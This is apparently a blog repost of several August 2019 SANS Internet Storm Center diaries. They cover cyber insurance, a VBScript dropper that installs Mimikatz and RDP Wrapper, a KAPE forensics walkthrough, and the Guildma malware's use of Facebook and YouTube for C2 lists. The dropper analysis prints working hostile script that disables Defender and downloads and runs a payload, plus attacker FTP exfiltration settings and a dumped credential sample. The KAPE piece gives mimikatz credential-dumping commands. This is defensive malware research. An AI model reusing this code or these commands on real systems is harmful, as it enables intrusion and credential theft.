Blog

Archive for August, 2019

Are there any Advantages of Buying Cyber Security Insurance?, (Sun, Aug 25th)

I recently was reading an article about Cyber Insurance and got intrigue on the type of coverage offered. Recovering from a Cyber attack can be very expensive and cyber security insurance offers the ability to transfer some of the risks to an insurance company. Some estimates that 1 in 3 company currently have cyber insurance. Then I found this presentation [2] that identified 10 misconceptions about Cyber insurance and provided an answer about each of them. I found very interesting the #1 Objection “We outsource our IT Services” and one of the 3 answers is even if the data is outsourced, “Legal responsibility CANNOT be transferred by contract”, it is the data the company has been entrusted to protect.

I started looking around and found several companies offering various type of coverage that range from:

  • Covering direct costs responding to an incident
  • Lawsuits or claims resulting from a cyber incident
  • Reputation management
  • Regulatory fines payments.

The policy cost will vary according to several factors such as the industry, the company size, past claims (if any), security in place, etc.

For example, Equifax 2017 data breach cost them an estimated 1.4 billion [3] and they had only $125 million covered by insurance. In the past, this type of breach would have probably bankrupt the business.

I tried one of the Cyber insurance website to get a basic quote for a small IT company with 1 million in liability and the annual cost is $885 per year. Here is the result:

[1] https://www.zensurance.com/cyber-liability-insurance
[2] https://www.schinnerer.com/Content/Industries/Cyber/Documents/Cyber_Webinar_-_Overcoming_Cyber_Insurance_Objections.aspx
[3] https://www.databreaches.net/equifax-reaches-1-4-billion-data-breach-settlement-in-consumer-class-action-also-agrees-to-pay-575-million-as-part-of-settlement-with-ftc-cfpb-and-states-related-to-2017-data-breach/

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Simple Mimikatz & RDPWrapper Dropper, (Thu, Aug 22nd)

Let’s review a malware sample that I spotted a few days ago. I found it interesting because it’s not using deep techniques to infect its victims. The initial sample is a malicious VBScript. For a few weeks, I started to hunt for more Powershell based on encoded directives. The following regular expression matched on the file:

// New-Object
$enc09 = /(TmVx33LUx39iamVjd[A-P]|[x2bx2f-x39A-Za-z][x2bx2f-x39A-Za-z][x31x35x39BFJNRVZdhlptx]OZXctTx32JqZWNx30[x2bx2f-x39A-Za-z]|[x2bx2f-x39A-Za-z][x30EUk]x35ldyx31PYmplYx33[Q-T])/

The initial script (SHA256:bf06b682c637d470b15e3c7b76e6d25356719286cfcc75a12bf3c31be859d2b5) is, still today, detected by only one AV engine[1]. Here is a beautified version of the script:

sDir = "C:ProgramDataID.dat"
Set oFSO = CreateObject("Scripting.FileSystemObject")
If oFSO.FileExists(sDir) Then
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    objFSO.DeleteFile WScript.ScriptFullName
    WScript.Quit()
Else
    wscript.sleep(333000)
    Dim ShaDev
    set hfhejotgbhzlzyohafchtul = createobject("wscript.shell")
    ShaDev = hfhejotgbhzlzyohafchtul.ExpandEnvironmentStrings("%ProgramData%")
    Set shadow=CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
    shadow.dataType="bin.base64"       
    shadow.text="... [Base64 chunk of dat] ..."
    Set sexy=CreateObject("ADODB.Stream")
    sexy.Type=1
    sexy.Open
    sexy.Write shadow.nodeTypedValue
    sexy.SaveToFile ShaDev & "WindowsProtect.vbs",2
    wscript.sleep(4000)

    Sub KillAll(ProcessName)
        Dim objWMIService, colProcess
        Dim strComputer, strList, p
        strComputer = "."
        Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!" & strComputer & "rootcimv2")
        Set colProcess = objWMIService.ExecQuery ("Select * from Win32_Process Where Name like '" & ProcessName & "'")
        For Each p in colProcess
            p.Terminate             
        Next
    End Sub

    KillAll "cmd.exe"

    Set objWMIService = GetObject("winmgmts:.rootcimv2")
    Do
        Running = False
        Set colItems = objWMIService.ExecQuery("Select * from Win32_Process")
        For Each objItem in colItems
            If objItem.Name = "cmd.exe" Then
                Running = True
                Exit For
            End If
        Next
        If Not Running Then
            Set objShell = CreateObject("Shell.Application")
            objShell.ShellExecute "cmd", "/k ""C:ProgramDataWindowsProtect.vbs", "", "runas", 0
        End If
    Loop While Not Running
    WScript.Sleep 4000

    KillAll "cmd.exe"

    Dim fso, MyFile
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set MyFile = fso.CreateTextFile("C:ProgramDataID.dat", True)
    MyFile.WriteLine(" ")
    MyFile.Close

    Set objFSO = CreateObject("Scripting.FileSystemObject")
    objFSO.DeleteFile WScript.ScriptFullName
    WScript.Quit()
End If

Not obfuscated, it is easy to understand its behaviour: First, it checks the presence of itself (if the victim has already been infected) by checking the existence of an ‘ID.dat’ file. If it exists, it removes the file and exits. Otherwise, another second-stage VBScript is decoded, dumped on disks and executed (‘WindowsProtect.vbs’). Let’s have a look at the second stage.

The decoded Base64 data (SHA256:6a25a0dbc0627e36e307e87e677e307d08982720c3dbeffe9986c3c770c37fa8)  is unknown on VT. Here is the script:

Dim x
Dim y
Dim z
x = " Set-MpPreference -DisableIOAVProtection $true"
y = " Add-MpPreference -ExclusionPath 'C:'"
z = " -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('hxxp://92[.]53[.]91[.]141/MP3/T0R.mp3','C:ProgramDataIsass.exe');Start-Process 'C:ProgramDataIsass.exe'"
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
command = ("powershell" & x )
commany = ("powershell" & y )
commanz = ("powershell" & z )
objShell.Run command,0
wscript.sleep(4000)
objShell.Run commany,0
wscript.sleep(11000)
objShell.Run commanz,0
Set objShell = Nothing
wscript.sleep(4000)
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.DeleteFile WScript.ScriptFullName
WScript.Quit

The next stage is, of course, the malicious PE file (SHA256:b5cc67c06f1352039209557aa8e62e1eabefaa4646fe449326bf50f62382eacd) and is also unknown on VT. It’s a classic PE file:

[email protected]:~# exiftool Isass.exe
ExifTool Version Number         : 9.46
File Name                       : Isass.exe
Directory                       : /tmp
File Size                       : 4.6 MB
File Modification Date/Time     : 2019:08:22 14:44:24-04:00
File Access Date/Time           : 2019:08:22 14:44:23-04:00
File Inode Change Date/Time     : 2019:08:22 14:44:24-04:00
File Permissions                : rw-r--r--
File Type                       : Win32 EXE
MIME Type                       : application/octet-strea
Machine Type                    : Intel 386 or later, and compatibles
Time Stamp                      : 2017:08:11 09:54:06-04:00
PE Type                         : PE32
Linker Version                  : 14.0
Code Size                       : 188928
Initialized Data Size           : 69632
Uninitialized Data Size         : 0
Entry Point                     : 0x1cec9
OS Version                      : 5.1
Image Version                   : 0.0
Subsystem Version               : 5.1
Subsystem                       : Windows GUI

The PDB path (‘D:ProjectsWinRARsfxbuildsfxrar32Releasesfxrar.pdb’) discloses that the PE file is a self-extracting archive. Program Data Base files are used to keep debugging info about a program when it is compiled. The PDB stores many interesting data like symbols, addresses, names of resources etc. 

SFX files can execute a script once the content is unpacked. Easy to detect in the PE strings:

[email protected]:~# strings Isass.exe | grep Setup=
Setup=%SystemDrive%IntelLogsh32.exe %SystemDrive%IntelLogsbeforeinstall.bat

Here is an extract of the script:

@echo off
set CURRENTPATH=%SystemDrive%IntelLogs
set INSTALLPATH=%SystemDrive%ProgramDataMicrosoftWindowsUpdates

mkdir %INSTALLPATH%
del /F /Q %INSTALLPATH%install.bat
move /Y %CURRENTPATH%Tor  %INSTALLPATH%
move /Y %CURRENTPATH%Data %INSTALLPATH%
move /Y %CURRENTPATH%Service %INSTALLPATH%
move /Y %CURRENTPATH%h64.exe %INSTALLPATH%h64.exe
move /Y %CURRENTPATH%h32.exe %INSTALLPATH%h32.exe
move /Y %CURRENTPATH%zip.exe %INSTALLPATH%zip.exe
move /Y %CURRENTPATH%ncftpput.exe %INSTALLPATH%ncftpput.exe
move /Y %CURRENTPATH%ftps.cfg %INSTALLPATH%ftps.cfg
move /Y %CURRENTPATH%install.bat %INSTALLPATH%install.bat
move /Y %CURRENTPATH%mimitask.bat %INSTALLPATH%mimitask.bat

reg Query "HKLMHardwareDescriptionSystemCentralProcessor" | find /i "x86" > NUL && set OS=32BIT || set OS=64BIT

if %OS%==32BIT set hidexe=h32.exe
if %OS%==64BIT set hidexe=h64.exe

cd %INSTALLPATH%
%hidexe% install.bat >> %INSTALLPATH%Serviceinstall.log 2>>&1

cd %CURRENTPATH%
rmdir /S /Q %CURRENTPATH%Tor
rmdir /S /Q %CURRENTPATH%Data
rmdir /S /Q %CURRENTPATH%Tor
DEL /Q /F %CURRENTPATH%Data
DEL /Q /F %CURRENTPATH%Service
DEL /Q /F %CURRENTPATH%h64.exe
DEL /Q /F %CURRENTPATH%h32.exe
DEL /Q /F %CURRENTPATH%zip.exe
DEL /Q /F %CURRENTPATH%ncftpput.exe
DEL /Q /F %CURRENTPATH%ftps.cfg
DEL /Q /F %CURRENTPATH%install.bat
DEL /Q /F %CURRENTPATH%mimitask.bat
rmdir /S /Q %CURRENTPATH%
DEL /Q /F  "%~f0" > NUL

You can see that many files are dropped on the infected computer. The more interesting ones are:

  • ncftpput.exe
  • ftps.cfg
  • mimikatz.bat
  • install.bat
  • ToR package

The ‘install.bat’ script is also very interesting (SHA256:550e8e6fcfc4db2139dfa2e6e4f26e881b405e21b752a750d4cc682da0361567) and also unknow on VT. Too big to be posted here, here is an overview of its features:

  • Check the geographical location of the victim via different GeoIP services
  • Create a new administrator user (‘Admlnlstrator’) with the following password: ‘Zhopka222222′
  • Disable Windows Defender
  • Install RDP Wrapper library[2]
  • Dump credentials via Mimikatz
  • Install a scheduled task to re-execute Mimikatz and exfiltrate data at each boot time.

The RDP wrapper is fetched from another site: hxxp://yourdatafor[.]me:94/azaza/:

Collected data are exfiltrated via FTP (FTP is still alive!) via the ncftpput.exe tool. The configuration is present in the archive in the ftps.cfg file:

[email protected]:~# cat ftps.cfg
host etomakra.me
user ftpuser
pass Super123123

Yes, even attackers use weak passwords! The server is not protected and allows to download all files collected from victims. The domain ‘etomakra.me’ has been registered on July 16th 2019.

I synchronized them during a few days (now the FTP server is down). For each victim, two files were uploaded:

The first one contains the malware installation logs:

[email protected]:~# unzip -t PLAYBOX1_RDP.zip
Archive:  PLAYBOX1_RDP.zip
    testing: Program Files/RDP Wrapper/hostname.log   OK
    testing: Program Files/RDP Wrapper/installer.log   OK
    testing: Program Files/RDP Wrapper/tor_install.log   O
No errors detected in compressed data of PLAYBOX1_RDP.zip.

The second one contains the output of Mimikatz:

[email protected]:~# unzip -t DESKTOP-UII5HVF_82742.zip
Archive:  DESKTOP-UII5HVF_82742.zip
    testing: ProgramData/Microsoft/NetFramework/Test/credoz.txt   OK
No errors detected in compressed data of DESKTOP-UII5HVF_82742.zip.

Each archive contains the same file ‘credoz.txt’:

[email protected]:~# head -30 credoz.txt
Hostname: [redacted] / authoritysystem-authoritysystem

  .#####.   mimikatz 2.1.1 (x64) #17763 Feb 23 2019 12:03:02
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
 ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ##  / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 2254335948 (00000000:865e6fcc)
Session           : RemoteInteractive from 2
User Name         : Admlnlstrator
Domain            : [redacted]
Logon Server      : [redacted]
Logon Time        : 2019/08/17 19:33:43
SID               : S-1-5-21-2984074050-2788484596-579673664-1006
        msv :
         [00000003] Primary
         * Username : Admlnlstrator
         * Domain   : [redacted]
         * NTLM     : eddcae2f04515b3a77e37ff4f5d2878d
         * SHA1     : 0a19e0af02162b596b2bc58f0c9f26c1ddfad698
         [00010000] CredentialKeys
         * NTLM     : eddcae2f04515b3a77e37ff4f5d2878d
         * SHA1     : 0a19e0af02162b596b2bc58f0c9f26c1ddfad698
        tspkg :
        wdigest :
         * Username : Admlnlstrator

You can see that the rogue administrator account has been used. In one week, I collected 188 credential files from the FTP server! Based on the re-upload of new files at every reboot, the number of unique victims is 53:

[email protected]:~# ls -1 creds/*.zip|awk -F "_" '{ print $1 }'|sort -u|wc -l
53

Did you see the same kind of activity? Do you have more information about this malware? Feel free to share!

[1] https://www.virustotal.com/gui/file/bf06b682c637d470b15e3c7b76e6d25356719286cfcc75a12bf3c31be859d2b5/detection
[2] https://github.com/stascorp/rdpwrap/

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

KAPE: Kroll Artifact Parser and Extractor, (Wed, Aug 21st)

KAPE vs Commando, another Red vs Blue vignette

Once in awhile the Twittersphere really sends me signal regarding content opportunities and potential research areas. If you follow any Blue Team aficionados, as I do, you’ll likely have seen the same level of chatter and excitement I have regarding Eric Zimmerman’s KAPE, the Kroll Artifact Parser and Extractor. In short, KAPE is a triage program to target devices or storage locations, find forensic artifacts, and parse them.

Introduction
On the heels of last month’s discussion regarding Commando VM, the system I implemented for that review serves us well to pit KAPE versus Commando. To do so, I self-pwned and conducted adversarial activity using the Command tool set, then utilized KAPE’s intrinsic triage, identify, and parse capabilities.

Before the red versus blue walkthrough, a few key elements. KAPE documentation is extensive, comprehensive, and effective. I’ll not belabor our time here replicating much of what Eric has produced, as always read this documentation before going too far in your KAPE testing and implementation.

Updating KAPE is as easy as

Get-KAPEUpdate.ps1

from a PowerShell prompt and

kape.exe --sync

from a command prompt.

KAPE updates

Figure 1: KAPE update

You’ll want to explore gkape, the KAPE graphical interface, simply because it will help you quickly enumerate all the target and module options, and learn how to quickly build out your commandline payloads, including a Copy command feature.

gkape

Figure 2: gkape

In scenarios such as this, I’m particularly fond of !BasicCollection, CombinedLogs, EvidenceOfExecution, PowerShellConsole, and RegistryHives as Targets. For Modules, I utilize RegRipper-ALL (Registry), PowerShell and PECmd (ProgramExecution), all the tools in the LiveResponse category), WindowsEventLogs, SecurityEventFullLogView, PowerShellOperationalFullEventLogView, EvtxECmd, all under the EventLogs category, and SecurityEvents under AccountUsage. As I was writing this, Eric added Mini_Timeline and Mini_Timeline_Slice_By_Daterange, literally as I was thinking “Boy, a timeliner module would be pretty slick.” Well done!
NOTE-MISSION CRITICAL: You will need to download tools and place them in KAPEModulesbin, including RegRipper (rip.exe), tln.exe and parse.exe from @keydet89’s GitHub repo, Nirsoft and TZWorks binaries, and others you may wish to utilize. Note that you’ll need p2x5124.dll for RegRipper and the Mini_Timeline tools, it should be in the same directory with each binary. You’ll be warned amply to do so. When you execute a job, watch the shell too, missing tools will be called out purple text. You can also review the console log, found under ModuleResults, after a run.
As I ran KAPE on my same dedicated host where I installed the Commando tool set last month, I simply set C: as my Target source and C:toolsKAPElocalhost as my Target destination. Similarly, for Modules, I left Module source blank and set C:toolsKAPElocalhostModuleResults for my Module destination.

Commando

RED: Commando – SharpDump

To pit KAPE versus Commando, I went back to the GhostPack well and compiled SharpDump. GhostPack is HarmJ0y’s collection of security related toolsets, and SharpDump is a C# port of PowerSploit’s Out-Minidump.ps1 functionality. As with all the Ghostpack tools included in Commando, you must compile them yourselves, no binaries are provided. Much as we did last month with Seatbelt, utilize Visual Studio Community 2019 on , set up for Windows development (.NET, desktop, and UWP), and then open SharpDump.sln, found in C:toolsGhostPackSharpDump. Be sure to run Visual Studio as administrator for this step. In Solution Explorer, right-click SharpDump and select Build. You’ll then find SharpDump.exe in C:toolsGhostPackSharpDumpSharpDumpbinRelease.
SharpDump, when executed, will create a debug output file as seen Figure 3.

SharpDump

Figure 3: SharpDump

The output file is written to C:Windowstemp, mine was debug896.bin. Move it, rename it debug.gz, and decompress it. I did so in my SharpDump directory. To finish the adversarial process, you’ll find mimikatz in C:toolsMimikatzx64 on a Commando-enabled system. In the mimikatz console, I changed directory to my SharpDump release folder, and ran

sekurlsa::minidump debug896
sekurlsa::logonPasswords full

The result is seen in Figure 4.

mimikatz

Figure 4: mimikatz

Congratulations, you have created a more than sufficient amount of malicious artifacts to identify with KAPE for the Blue part of this exploration.

KAPE

BLUE: KAPE

As we’re working through an arbitrary scenario here, we already have what could be consider IOCs. Loosely translated, your threat intel or SOC team would like escalate with something akin to intel or telemetry indicating that a potential adversary likely created a dump file with all process memory to disk and used mimikatz to acquire identity artifacts. I set up a KAPE run as described above, it’s mighty quick (Figure 5).

Figure 5: KAPE run

Results awaited me in C:toolsKAPElocalhostModuleResults, per my configuration. Events of interest were immediately discoverable in EventLogs, LiveResponse, and ProgramExecution folders. The first artifacts of malfeasance related to our SharpDump scenario comes via results from Systinternals Handle viewer results found in LiveResponse. Prior the actual execution of SharpDump the adversary (me, knucklehead that he is) chose to compile SharpDump on the same system. 😉 Visual Studio creates a SQLite database in the compiled project folder. Figure 6 reveals all the related handles entries.

Handles

Figure 6: SharpDump handles

As an analyst/investigator, I consider timeline data absolutely essential. Eric’s PECmd results flourish in this regard. From ProgramExecution output, 20190817003023_PECmd_Output_Timeline.csv revealed the following entry, from many:

8/16/2019 21:04,VOLUME{01d530564cd90cbb-a64cf119}TOOLSMIMIKATZX64MIMIKATZ.EXE  
8/16/2019 20:14,VOLUME{01d530564cd90cbb-a64cf119}TOOLSGHOSTPACKSHARPDUMPSHARPDUMPBINRELEASESHARPDUMP.EXE

This is spot on given that, when in red mode, I compiled SharpDump then walked away for almost an hour before coming back to run the dump through mimikatz.
Need more magic from full PECmd output? The full entry from 20190817003023_PECmd_Output.csv of the 21:04 mimikatz execution is evident in Figure 7.

PECmd mimikatz

Figure 7: PECmd mimikatz details

If you’ve enabled verbose PowerShell logging (if you haven’t, shame on you) such that you get all the juicy details in Windowssystem32winevtlogsMicrosoft-Windows-PowerShell%4Operational.evtx you’ll find glorious results in EventLog, 20190817002759_EvtxECmd_Output.csv in my case. Related results seen in Figure 8.

EventID 4104

Figure 8: EventID 4104

Behold the beauty of a snippet from a full content EventID 4104, with a whole lotta mimikatz. 🙂 Did I mention that turning on PowerShell logging yields invaluable results? Yes, I did, but let me really drive the point home with an additional scenario.

RED: Commando – PowerSploit tests

I love PowerSploit, and so do a plethora of jackelope script kiddies. Ever investigated compromised systems that have been stomped by really loud, really unsophisticated interlopers? I thought I’d make the point in similar noisy fashion, in the most simpleton manner. The PowerSploit framework includes an outstanding test suite to determine module success and failure. I lit the test suite up on my victim as seen in Figure 9.

PowerSploit test

Figure 9: PowerSploit test scripts

The results were noisy, noisy, noisy, and again, with verbose PowerShell logging, a wonderful way to highlight a related KAPE module.

BLUE: KAPE

With verbose PowerShell script block logging enabled throughout your enterprise, you can spot a good bit of up-to-no-good. On the heels of the PowerSploit test scripts, I ran the following seen in Figure 10 to see what turned up. It runs Nirsoft’s Full Event Log Viewer.

KAPE config

Figure 10: KAPE full event viewer config

The results, as expected, write to the EventLogs folder, as full_powershell_operational_event_log.csv.

The first hit in the results sums things up nicely. As part of the PowerSploit recon test suite, Invoke-StealthUserHunter was tester. In my case it failed and threw an error, but a small snippet of the entry from the PowerShell operational event log follows in Figure 11.

Figure 11: KAPE full event viewer results

As you can imagine, with the PowerSploit test suite, there were plenty of script block logs entries to follow. If your adversary attempts to used PowerShell modules from any of the well-known offensive PowerShell frameworks, you will spot them with PowerShell script block logging and KAPE during investigations. You should also be building detections on PowerShell specific indicators found via script block logging.

Conclusion

A few takeaways:
Read the actual module script content by double-clicking them in gkape. You’ll learn a lot, and it can help debug configurations as well. KAPE is a beast. To be fair, I did it almost no justice here, these are painfully simple scenarios. But I do hope they served to kick in your intrigue and lead you to exploring Eric and team’s magnificent work. Have fun, there are endless options, configurations, and opportunities come in behind Red Team and clean up all their rainbow unicorn skittles doodie.

Blue Team, you rock.
Cheers…until next time.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Guildma malware is now accessing Facebook and YouTube to keep up-to-date, (Tue, Aug 20th)

A new variant of the information stealer Guildma (aka Astaroth) we analyzed last week is accessing Facebook and YouTube to get a fresh list of its C2 servers. The C2 list is encrypted and hosted in two Facebook and three YouTube profiles maintained and constantly updated by the cybercriminals. 

This innovative strategy is probably helping the current infections to resist to expected C2 takedowns as access to Facebook and YouTube are usually allowed and not associated with malicious code activities. 

The ongoing campaign has 76 C2 servers (and counting) and its main target is South America – especially Brazil. An analysis of a different variant made by Avast late last month [1] reported that 155,000 infections were blocked just by their own solution. 

In this diary, we provide details on how Guildma employs its multiple-stage and evasion techniques from the infection to data exfiltration. 

Threat Analysis

Follow the numbers in blue in the image above and the descriptions of each step below:

Threat Analysis Diagram

 

1. E-mail Phishing

As usual, the campaign starts with an e-mail phishing. The message supposedly comes from MINISTÉRIO PÚBLICO FEDERAL of Brazil, has no attachment but urges the user to click on a link. Take a look at the message:

E-mail Phishing

2. The phishing link

The phishing link takes the user to download a zip file. The downloaded zip file contains another zip which, finally, contains an ‘LNK’ file. Once executed, the ‘LNK’  downloads and execute a JavaScript, as shown in the following image. The JavaScript file is downloaded from a ‘cloudflareworkers.com’ subdomain. 

LNK downloading and executing a JavaScript

A good tool to analyze “LNK” files is LECmd by Eric Zimmerman [2].

3. The JavaScript

The JavaScript downloads 11 files hosted in different cloudflareworkers.com subdomains. The downloaded files are stored locally at the path “C:UsersPublicLibrarieswin32”. 

The cloudflareworkers.com subdomains are randomly selected during the JavaScript execution—probably for evasion and redundancy purposes.

JavaScript snippet

Most of the 11 files have disguising extensions, like JPG and GIF. However, just a few have meaningful content, like (halawxtz64a.dll and halawxtz64b.dll). These two files concatenated forms a DLL file which is loaded in the next stage. Most of the other files are encrypted using a custom algorithm. 

4. DLL side loading

In this stage, it is employed a technique called DLL side-loading in which a legit program, intended to load its legit DLLs end up loading a malicious DLL with the same name from the current or from a specified path. Know more about DLL side-loading at [3].

The side-loading technique, in this case, is employed using the program “C:Program Files (x86)Internet ExplorerExtExport.exe”. ExtExport is a legit binary part of Internet Explorer installation which loads DLLs named mozcrt19.dll, mozsqlite3.dll or sqlite3.dll from the specified path given as an argument. The perfect candidate for the job.

The ExtExport is loaded with the argument “C:UsersPublicLibrarieswin32” which contains the dropped files and the concatenation of halawxtz64a.dll and halawxtz64b.dll files, as seen below.

DLL side-loading

5. Process Hollowing

Now, the malicious DLL running under the ExtExport process employs another evasive technique called Process Hollowing. Process Hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code [4]. 

The “process-hollowed” program in this scenario is “C:Program FilesDieboldWarsawunins000.exe“. It is part of Diebold Warsaw installation—a security suite largely used and installed in most systems used to access online banking in Brazil.

The content injected in the suspended unins000.exe process memory is the concatenation of halawxtzxa.~ and halawxtzxb.~ files. After the memory injection, the process is resumed (ResumeThread) as seen in the following image.

 
Process Hollowing

6. Obtaining C2 addresses in an innovative way

There are some suspect addresses hardcoded into the binaries, however, the C2 addresses used to exfiltrate data are obtained from Facebook and Youtube profiles maintained and constantly updated by the cybercriminals.

Take a look at the DNS requests to YouTube and Facebook shortly before a C2 name resolution.

YouTube and Facebook Requests

 

Following two of the Facebook and YouTube requested URLs, we reached the following contents:

Facebook post with a suspecting content
Youtube profile about

The suspecting content, between “|||” marks, is base64 encoded. However simple decoding isn’t enough as the data is encrypted as well. For example, base64 decoding the sequence “Sm5EblBrT25HbkluRm5BbVVtU25…” results in “JnDnPkOnGnInFnAmUm…”, which is not meaningful. 

Analyzing a little bit deeper the malware code, specifically at the moment it reaches Facebook and YouTube URLs, it was possible to understand the decryption process and reverse it.

Facebook and Youtube posts decryption

To make things easy, we created a Python script to automate the job, as seen below.

Python script to decrypt C2 list and commands

Applying this decryption function to one of this campaign’s Facebook post we got a list of multiple addresses that would later be used by the malware as C2 servers:

“my-project-proxy-1–249108.appspot.com;my-project-novo-3-proxy.appspot.com;my-project-proxy-2.appspot.com;my-project-proxy-4.appspot.com;my-project-proxy-5.appspot.com;my-project-proxy-6.appspot.com;my-project-proxy-7.appspot.com;my-project-proxy-8.appspot.com;”

It’s important noting that this is just part of the C2 addresses used in this campaign. Thanks to Facebook’s editing history feature, it was possible to decrypt all messages from June 30, 2019, to now.

The result is a list of 76 unique C2 servers

Editing History

7. Running information stealers

Once C2 addresses are loaded, the malware starts loading the information stealers modules. The code for each information stealer is decrypted from the dropped files, like “halawxtza.jpg”, and instanciated as child processes. 

One of the modules focuses on stealing passwords stored in different applications, like Web Browsers and E-mail Clients, as seen below. 

Password Stealer module

The captured information, including screen captures, is encrypted and stored in files inside the path “C:UsersPublicLibrarieswin32”, as seen below.

Captured data

8. Data exfiltration

The captured data is sent to one of the C2 servers retrieved in step 6. 

In the example below, the information is sent to C2 “soy-tower-248822[.]appspot[.]com” via HTTPS. 

Data Exfiltration

Additionally to SSL, the exfiltrated data receive two layers of encryption. One to tell the C2 the filename and the other for its content. 

Exfiltrated data

Final comments

This sample shows us the importance of truly understanding threats’ TTPs (Tactics, Techniques, and Procedures) in addition to simply using IP and file hashes indicators – it reminds me of the Pyramid of Pain concept [5]. An environment infected with this variant of Guildma relying solely on blocking C2 IP addresses as they are discovered, would not stop the threat as fresh C2 addresses may be continually retrieved from apparently trusted sources. 

Facebook and YouTube were reported about the profiles involved in this malicious campaign. 

IOCs

C2 list:

my-project-2-248206[.]appspot[.]com
theta-cider-248821[.]appspot[.]com
artful-hexagon-247421[.]appspot[.]com
maxfolte[.]appspot[.]com
sistemak04full[.]appspot[.]com
red-cable-247421[.]appspot[.]com
my-projectstr-820381[.]appspot[.]com
named-aspect-248677[.]appspot[.]com
bamboo-cocoa-249211[.]appspot[.]com
loyal-coast-249211[.]appspot[.]com
plasma-raceway-249211[.]appspot[.]com
my-project-proxy-8[.]appspot[.]com
controleal[.]dominiotemporario[.]com
sistemak01full[.]appspot[.]com
sixth-zoo-249221[.]appspot[.]com
sigma-hydra-249900[.]appspot[.]com
summer-bond-244902[.]appspot[.]com
my-project-novo-3-proxy[.]appspot[.]com
verificado[.]dominiotemporario[.]com
flowing-indexer-247521[.]appspot[.]com
focal-charge-247106[.]appspot[.]com
soy-tower-248822[.]appspot[.]com
woven-victor-249220[.]appspot[.]com
even-lyceum-248206[.]appspot[.]com
manifest-geode-248821[.]appspot[.]com
sistemak05full[.]appspot[.]com
my-project-4837144[.]appspot[.]com
sonic-glazing-249610[.]appspot[.]com
woven-mesh-248688[.]appspot[.]com
august-victor-248822[.]appspot[.]com
teak-clone-248821[.]appspot[.]com
my-projectxr-322731-246412[.]appspot[.]com
controleal[.]sslblindado[.]com
silent-cider-243303[.]appspot[.]com
scenic-bolt-249222[.]appspot[.]com
buoyant-aloe-248666[.]appspot[.]com
psychic-era-248820[.]appspot[.]com
resonant-gizmo-248323[.]appspot[.]com
my-project-proxy-2[.]appspot[.]com
my-project-05-249211[.]appspot[.]com
my-project-proxy-7[.]appspot[.]com
rolterx[.]appspot[.]com
my-project-proxy-6[.]appspot[.]com
proven-impact-247521[.]appspot[.]com
cobalt-list-248323[.]appspot[.]com
reflected-agent-249010[.]appspot[.]com
valued-mission-249211[.]appspot[.]com
mankerop[.]appspot[.]com
fine-pride-248716[.]appspot[.]com
sistemak02full[.]appspot[.]com
my-project-proxy-1-249108[.]appspot[.]com
market-off[.]appspot[.]com
hazel-env-249323[.]appspot[.]com
my-projectxr-322731[.]appspot[.]com
gifted-symbol-248821[.]appspot[.]com
my-projectxr-322731-246412
stellar-river-248300[.]appspot[.]com
logical-air-248822[.]appspot[.]com
vital-invention-246411[.]appspot[.]com
sistemak03full[.]appspot[.]com
metal-arc-247207[.]appspot[.]com
my-project-proxy-5[.]appspot[.]com
my-project-06-249211[.]appspot[.]com
praxis-water-248822[.]appspot[.]com
lyrical-cacao-249010[.]appspot[.]com
midyear-lattice-243611[.]appspot[.]com
my-project-398345[.]appspot[.]com
stone-lodge-248655[.]appspot[.]com
sinuous-city-246418[.]appspot[.]com
adroit-petal-249010[.]appspot[.]com
my-project-proxy-4[.]appspot[.]com
my-project-78947prx[.]appspot[.]com
civil-dolphin-249609[.]appspot[.]com
airy-ripple-247522[.]appspot[.]com
my-project-04-249211[.]appspot[.]com
civil-partition-249711[.]appspot[.]com
https://djadbs4zeunf[.]certificados1n7p0x1b1[.]store/
http://emoaeefwauakw[.]informativoinadiplencia[.]xyz

Facebook and YouTube URLs

https://www[.]youtube[.]com/channel/UCTN4wLOwIUoebHmPQM47Yzw/about
https://www[.]youtube[.]com/channel/UC1mMPPv6X7LzvPGOWQmT9hg/about
https://www[.]youtube[.]com/channel/UCEhLqZZR0oXsNCtQT1zEi9w/about
https://www[.]facebook[.]com/permalink[.]php?story_fbid=1233322216856141&id=1233309900190706
https://www[.]facebook[.]com/permalink[.]php?story_fbid=850799741943857&id=100010415162411

Hashes

halawxtzxb.~
6c81fa46dd6762b69c1651125946e063
c665466e12ede25c97279f81668f5975ed4be93c
2b2acd79f309d6453b319c2c0250b599d2a26f2c65a6b6a231a6157e96f4feac
316536 

halawxtzxa.~
9411341b781aa43b66b8f83658d5011b
1962486f3b1b48ad576b752618d41839a1470a77
89f1fba39982ca09a8b329f82a46b34d5f8caf21bfe72940650186391bc6d095
325000

halawxtzgx.gif
a3dd42e226ace4c09e23163b524282ac
a53ee4d5095fc25f8867de1d6863fe4ab14e851f
606b3711828a7d82b16217f345715550d92a3871ee2cf6f901751292f164ef69
646656

halawxtzg.gif
897a65519c433c25227cb2eff858f255
8752a5bd75f0cab3cb51e364790b51ebce473d7f
03babea27593c3bb0fda41b7cbd2749062a17319d50496db71fcca1e1007c191
1017344

halawxtzdx.gif
5ee713a85d8a8893f28ccd909b19a68d 
